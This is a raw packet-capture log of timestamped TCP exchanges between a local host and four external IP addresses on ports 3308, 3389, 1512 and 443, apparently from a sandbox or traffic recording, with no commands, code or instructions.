Jan 11, 2021 16:52:58.981995106 CET	49244	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:58.984745979 CET	49244	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:59.027786016 CET	3308	49244	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:59.102374077 CET	49245	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:59.155865908 CET	3389	49245	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:59.155978918 CET	49245	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:59.157185078 CET	49245	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:59.210551977 CET	3389	49245	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:59.229429007 CET	3389	49245	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:59.229445934 CET	3389	49245	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:59.229501963 CET	49245	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:59.238647938 CET	49245	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:59.298911095 CET	3389	49245	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:59.299041986 CET	49245	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:59.303756952 CET	49245	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:59.303879023 CET	49245	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:59.357371092 CET	3389	49245	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:59.357577085 CET	49245	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:59.396852016 CET	3389	49245	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:59.411242008 CET	3389	49245	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:59.411262989 CET	3389	49245	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:59.500340939 CET	3389	49245	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:59.500399113 CET	3389	49245	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:59.500617027 CET	49245	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:59.500653028 CET	49245	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:59.506162882 CET	49245	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:59.559885025 CET	3389	49245	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:59.614236116 CET	49246	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:59.667104959 CET	1512	49246	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:59.667196989 CET	49246	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:59.668693066 CET	49246	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:59.721452951 CET	1512	49246	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:59.733525038 CET	1512	49246	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:59.733572960 CET	1512	49246	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:59.733620882 CET	49246	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:59.733644962 CET	49246	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:59.742187977 CET	49246	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:59.796147108 CET	1512	49246	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:59.796221972 CET	49246	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:59.803596973 CET	49246	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:59.803734064 CET	49246	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:59.856431007 CET	1512	49246	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:59.856512070 CET	49246	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:59.892512083 CET	1512	49246	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:59.909281015 CET	1512	49246	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:00.008693933 CET	1512	49246	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:00.008781910 CET	1512	49246	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:00.008857012 CET	49246	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:00.008886099 CET	49246	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:00.014796019 CET	49246	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:00.067666054 CET	1512	49246	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:00.131339073 CET	49247	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:00.183648109 CET	443	49247	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:00.183733940 CET	49247	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:00.184420109 CET	49247	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:00.236586094 CET	443	49247	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:00.251307964 CET	443	49247	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:00.251413107 CET	49247	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:00.266028881 CET	49247	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:00.320585012 CET	443	49247	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:00.320735931 CET	49247	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:00.329505920 CET	49247	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:00.329646111 CET	49247	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:00.381834030 CET	443	49247	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:00.382124901 CET	49247	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:00.418941975 CET	443	49247	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:00.434436083 CET	443	49247	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:00.551206112 CET	443	49247	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:00.551228046 CET	443	49247	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:00.551446915 CET	49247	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:00.554501057 CET	49247	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:00.606741905 CET	443	49247	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:00.660757065 CET	49248	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:00.703927994 CET	3308	49248	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:00.704006910 CET	49248	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:00.704624891 CET	49248	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:00.748171091 CET	3308	49248	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:00.759615898 CET	3308	49248	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:00.759648085 CET	3308	49248	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:00.759767056 CET	49248	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:00.773701906 CET	49248	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:00.818754911 CET	3308	49248	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:00.818921089 CET	49248	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:00.829144955 CET	49248	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:00.829509020 CET	49248	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:00.872556925 CET	3308	49248	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:00.876075029 CET	49248	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:00.913167953 CET	3308	49248	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:00.919203997 CET	3308	49248	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:00.919258118 CET	3308	49248	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:01.030910969 CET	3308	49248	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:01.030952930 CET	3308	49248	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:01.031109095 CET	49248	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:01.033901930 CET	49248	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:01.077008009 CET	3308	49248	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:01.145613909 CET	49249	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:01.199248075 CET	3389	49249	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:01.199354887 CET	49249	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:01.200690985 CET	49249	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:01.254111052 CET	3389	49249	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:01.274327040 CET	3389	49249	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:01.274399996 CET	49249	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:01.274425983 CET	3389	49249	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:01.274487972 CET	49249	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:01.287908077 CET	49249	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:01.347970009 CET	3389	49249	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:01.348206043 CET	49249	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:01.357724905 CET	49249	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:01.357832909 CET	49249	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:01.411147118 CET	3389	49249	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:01.411396980 CET	49249	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:01.451031923 CET	3389	49249	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:01.465348959 CET	3389	49249	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:01.465373993 CET	3389	49249	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:01.556176901 CET	3389	49249	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:01.556226015 CET	3389	49249	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:01.556572914 CET	49249	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:01.556606054 CET	49249	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:01.562295914 CET	49249	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:01.615849972 CET	3389	49249	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:01.676073074 CET	49250	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:01.729270935 CET	1512	49250	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:01.729454994 CET	49250	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:01.730917931 CET	49250	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:01.783768892 CET	1512	49250	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:01.790920973 CET	1512	49250	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:01.790966988 CET	1512	49250	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:01.791093111 CET	49250	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:01.791146994 CET	49250	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:01.805066109 CET	49250	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:01.859210014 CET	1512	49250	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:01.859447956 CET	49250	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:01.869440079 CET	49250	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:01.869879961 CET	49250	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:01.922807932 CET	1512	49250	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:01.922950983 CET	49250	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:01.960707903 CET	1512	49250	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:01.975831985 CET	1512	49250	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:02.075526953 CET	1512	49250	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:02.075587988 CET	1512	49250	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:02.075643063 CET	49250	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:02.075685024 CET	49250	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:02.078788996 CET	49250	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:02.131617069 CET	1512	49250	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:02.186760902 CET	49251	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:02.239022017 CET	443	49251	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:02.239121914 CET	49251	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:02.239672899 CET	49251	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:02.292026043 CET	443	49251	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:02.306617022 CET	443	49251	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:02.306723118 CET	49251	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:02.324421883 CET	49251	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:02.378982067 CET	443	49251	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:02.379085064 CET	49251	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:02.384053946 CET	49251	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:02.384175062 CET	49251	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:02.436211109 CET	443	49251	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:02.436558008 CET	49251	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:02.474850893 CET	443	49251	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:02.488966942 CET	443	49251	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:02.606378078 CET	443	49251	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:02.606406927 CET	443	49251	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:02.606663942 CET	49251	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:02.611732006 CET	49251	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:02.663779974 CET	443	49251	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:02.716250896 CET	49252	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:02.759567976 CET	3308	49252	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:02.759737015 CET	49252	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:02.760509968 CET	49252	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:02.803606987 CET	3308	49252	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:02.818243027 CET	3308	49252	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:02.818262100 CET	3308	49252	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:02.818401098 CET	49252	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:02.854140997 CET	49252	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:02.899808884 CET	3308	49252	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:02.899902105 CET	49252	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:02.905092001 CET	49252	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:02.905358076 CET	49252	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:02.948410988 CET	3308	49252	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:02.948519945 CET	49252	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:02.988159895 CET	3308	49252	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:02.991729975 CET	3308	49252	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:02.991770029 CET	3308	49252	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:03.103019953 CET	3308	49252	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:03.103065014 CET	3308	49252	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:03.103355885 CET	49252	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:03.108810902 CET	49252	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:03.151973009 CET	3308	49252	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:03.220241070 CET	49253	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:03.274327993 CET	3389	49253	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:03.274636984 CET	49253	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:03.276041031 CET	49253	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:03.329734087 CET	3389	49253	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:03.360059977 CET	3389	49253	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:03.360100031 CET	3389	49253	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:03.360179901 CET	49253	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:03.360225916 CET	49253	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:03.374018908 CET	49253	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:03.437540054 CET	3389	49253	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:03.437658072 CET	49253	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:03.446434021 CET	49253	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:03.446640015 CET	49253	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:03.500351906 CET	3389	49253	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:03.500605106 CET	49253	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:03.540193081 CET	3389	49253	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:03.555094004 CET	3389	49253	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:03.555140972 CET	3389	49253	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:03.647733927 CET	3389	49253	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:03.647794008 CET	3389	49253	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:03.647969961 CET	49253	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:03.648015976 CET	49253	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:03.650634050 CET	49253	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:03.705010891 CET	3389	49253	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:03.763082981 CET	49254	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:03.816018105 CET	1512	49254	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:03.816121101 CET	49254	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:03.816977978 CET	49254	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:03.869679928 CET	1512	49254	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:03.876982927 CET	1512	49254	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:03.877002001 CET	1512	49254	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:03.877089977 CET	49254	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:03.889354944 CET	49254	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:03.943226099 CET	1512	49254	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:03.943528891 CET	49254	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:03.955013037 CET	49254	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:03.955153942 CET	49254	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:04.007865906 CET	1512	49254	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:04.007941961 CET	49254	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:04.044502020 CET	1512	49254	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:04.060681105 CET	1512	49254	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:04.060699940 CET	1512	49254	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:04.158332109 CET	1512	49254	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:04.158365011 CET	1512	49254	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:04.158560038 CET	49254	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:04.161365986 CET	49254	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:04.214116096 CET	1512	49254	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:04.277545929 CET	49255	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:04.329318047 CET	443	49255	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:04.329550982 CET	49255	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:04.331226110 CET	49255	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:04.382925987 CET	443	49255	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:04.397885084 CET	443	49255	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:04.397953987 CET	49255	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:04.406342030 CET	49255	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:04.460401058 CET	443	49255	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:04.460469007 CET	49255	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:04.464495897 CET	49255	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:04.464654922 CET	49255	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:04.516160965 CET	443	49255	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:04.516274929 CET	49255	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:04.567981958 CET	443	49255	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:04.685688019 CET	443	49255	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:04.685733080 CET	443	49255	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:04.685934067 CET	49255	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:04.688122034 CET	49255	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:04.740251064 CET	443	49255	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:04.795394897 CET	49256	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:04.838656902 CET	3308	49256	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:04.838803053 CET	49256	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:04.839648962 CET	49256	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:04.882783890 CET	3308	49256	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:04.893610954 CET	3308	49256	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:04.893641949 CET	3308	49256	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:04.893702030 CET	49256	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:04.895324945 CET	49256	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:04.908905029 CET	49256	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:04.953633070 CET	3308	49256	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:04.953902960 CET	49256	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:04.963277102 CET	49256	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:04.963450909 CET	49256	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:05.006567001 CET	3308	49256	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:05.006736994 CET	49256	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:05.047034979 CET	3308	49256	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:05.049804926 CET	3308	49256	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:05.049827099 CET	3308	49256	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:05.161596060 CET	3308	49256	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:05.161617994 CET	3308	49256	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:05.161854982 CET	49256	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:05.165134907 CET	49256	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:05.208362103 CET	3308	49256	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:05.275722027 CET	49257	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:05.332412004 CET	3389	49257	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:05.332637072 CET	49257	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:05.333967924 CET	49257	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:05.391165018 CET	3389	49257	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:05.419481039 CET	3389	49257	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:05.419503927 CET	3389	49257	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:05.419739008 CET	49257	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:05.430598021 CET	49257	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:05.494066000 CET	3389	49257	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:05.496268988 CET	49257	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:05.505816936 CET	49257	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:05.505901098 CET	49257	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:05.562630892 CET	3389	49257	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:05.562895060 CET	49257	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:05.599606991 CET	3389	49257	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:05.616936922 CET	3389	49257	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:05.616960049 CET	3389	49257	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:05.706444025 CET	3389	49257	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:05.706466913 CET	3389	49257	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:05.706593037 CET	49257	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:05.708388090 CET	49257	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:05.708847046 CET	49257	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:05.762871981 CET	3389	49257	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:05.822297096 CET	49258	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:05.875153065 CET	1512	49258	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:05.875329971 CET	49258	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:05.876749992 CET	49258	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:05.929423094 CET	1512	49258	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:05.936966896 CET	1512	49258	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:05.936984062 CET	1512	49258	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:05.937112093 CET	49258	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:05.952352047 CET	49258	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:06.006344080 CET	1512	49258	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:06.008567095 CET	49258	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:06.012696981 CET	49258	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:06.012840033 CET	49258	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:06.065587997 CET	1512	49258	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:06.065862894 CET	49258	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:06.104535103 CET	1512	49258	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:06.118714094 CET	1512	49258	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:06.118732929 CET	1512	49258	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:06.217962027 CET	1512	49258	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:06.217982054 CET	1512	49258	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:06.218174934 CET	49258	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:06.223757982 CET	49258	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:06.276547909 CET	1512	49258	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:06.340905905 CET	49259	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:06.393140078 CET	443	49259	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:06.393434048 CET	49259	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:06.395519018 CET	49259	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:06.447539091 CET	443	49259	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:06.462219000 CET	443	49259	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:06.462310076 CET	49259	443	192.168.2.22	77.220.64.37
